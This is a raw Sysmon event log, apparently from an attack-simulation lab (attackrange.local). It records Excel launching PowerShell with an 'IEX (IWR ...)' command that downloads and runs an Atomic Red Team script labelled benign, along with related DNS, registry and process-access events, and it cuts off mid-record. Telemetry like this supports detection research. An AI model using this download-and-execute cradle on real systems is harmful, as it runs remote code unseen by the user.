17:30:08.400{21761711-84C5-607D-E100-00000000BB01}32203420C:\Windows\system32\csrss.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 734700x80000000000000001529881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001529880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001529879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001529878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXEMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0trueMicrosoft WindowsValid 154100x80000000000000001529877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.404{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1') 734700x80000000000000001529876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001529875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001529874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001529873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436trueMicrosoft WindowsValid 10341000x80000000000000001529872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-84C5-607D-E100-00000000BB01}32203420C:\Windows\system32\csrss.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001529871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6063-6080-A15D-00000000BB01}31204888C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\SHELL32.dll+3cd0f|C:\Windows\System32\SHELL32.dll+3cb9c|C:\Windows\System32\SHELL32.dll+dcb5e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001529870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.401{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')C:\Users\Administrator\Documents\WIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" 12241200x80000000000000001529869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.384{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001529868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.384{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001529867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.384{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 12241200x80000000000000001529866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.384{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 10341000x80000000000000001529865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.384{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001529864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.199{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001529863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.199{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D51AE43C427A03ED610524A4C896B88,SHA256=21732CDEB8DD6DE69B643F5C123CE79610621502683E013C876889F6DB87CB45falsefalse - insufficient disk space 12241200x80000000000000001529862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.052{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 13241300x80000000000000001529861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.052{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData\308046B0AF4A39CBQWORD (0x01d736d3-0xf95fd275) 12241200x80000000000000001529860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.052{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData 10341000x80000000000000001529859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.052{21761711-84C9-607D-F200-00000000BB01}37844264C:\Windows\Explorer.EXE{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a30|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF80357CE08C8)|UNKNOWN(FFFFF2D93DAB4A38)|UNKNOWN(FFFFF2D93DAB4BB7)|UNKNOWN(FFFFF2D93DAAF241)|UNKNOWN(FFFFF2D93DAB0C0A)|UNKNOWN(FFFFF2D93DAAEEC6)|UNKNOWN(FFFFF803579F7E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001529858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.052{21761711-84C9-607D-F200-00000000BB01}37844264C:\Windows\Explorer.EXE{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+55511|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF80357CE08C8)|UNKNOWN(FFFFF2D93DAB4A38)|UNKNOWN(FFFFF2D93DAB4BB7)|UNKNOWN(FFFFF2D93DAAF241)|UNKNOWN(FFFFF2D93DAB0C0A)|UNKNOWN(FFFFF2D93DAAEEC6)|UNKNOWN(FFFFF803579F7E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001529857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.052{21761711-C665-607D-D60D-00000000BB01}4492WIN-HOST-5\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFb312d98.TMPMD5=0A3987995CAABA9D2D05576BFBDACCA4,SHA256=134B5D92AEA1E4DCEEF95C6317D978F0F8DF8AC008963BBBF96453B3409DC3FFfalsefalse - insufficient disk space 11241100x80000000000000001529856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.052{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFb312d98.TMP2021-04-21 17:30:08.052 254200x80000000000000001529855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.052{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64V8NL3K107UVSU7P5WV.temp2021-04-19 13:28:44.7592021-04-21 17:30:08.052 11241100x80000000000000001529854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.052{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64V8NL3K107UVSU7P5WV.temp2021-04-21 17:30:08.052 23542300x80000000000000001061014Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:09.995{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AAC83AD216B98F12940C09985A41F74,SHA256=B4A7FEB2D8C2E9EEA214222E2282893A054EB3FF00384E1D09092F083AE8753C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530352Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.787{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530351Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.787{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC43FBCE86F84D382937D8CBA360ED8A,SHA256=59006BAF5849877597C148A88D98D5491B97B10C42D643A6BBA843A63DF91D06falsefalse - insufficient disk space 23542300x80000000000000001061013Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:09.305{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B25D2F96AAD1D37E2E9B5BC56D89F94,SHA256=86945E2BDE546E87F34BE55D3118C8EEF7B69C3A64FEB5C4F7B633E09D2AD2DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061012Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:09.042{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061011Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:09.042{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530350Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.502{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-04-19 13:20:06.758 23542300x80000000000000001530349Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.502{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2E16BEBC8932964FA0EBA9C7F38B2292,SHA256=435E4C0D0893616E65D57277C23223CD951A128D48B2069DD418F5AB357580C0falsefalse - insufficient disk space 11241100x80000000000000001530348Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.402{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530347Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.402{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39B7BFF4F63DF130051133EBA0D4F4E8,SHA256=FC97AED4F91AC35D6D5B974316AF52956641D69B0DF9E5E598458D242A7DEFE6falsefalse - insufficient disk space 10341000x80000000000000001530346Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.017{21761711-83AE-607D-0D00-00000000BB01}7921392C:\Windows\system32\svchost.exe{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530345Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:09.017{21761711-83AE-607D-0D00-00000000BB01}7921392C:\Windows\system32\svchost.exe{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530361Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:10.821{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530360Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:10.821{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B300BC52C5356F5AC9ED27D34D4FD0B2,SHA256=BD58BF3F4DE2A13D902CFDF661C02BB813E5C760946D9DE30A9F5D8B12A4AD27falsefalse - insufficient disk space 10341000x80000000000000001061016Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:10.043{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061015Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:10.043{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x80000000000000001530359Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.592{21761711-6120-6080-BB5D-00000000BB01}388raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;::ffff:185.199.110.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 13241300x80000000000000001530358Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:10.220{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000140618\VirtualDesktopBinary Data 12241200x80000000000000001530357Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:10.220{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000140618 10341000x80000000000000001530356Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:10.157{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft 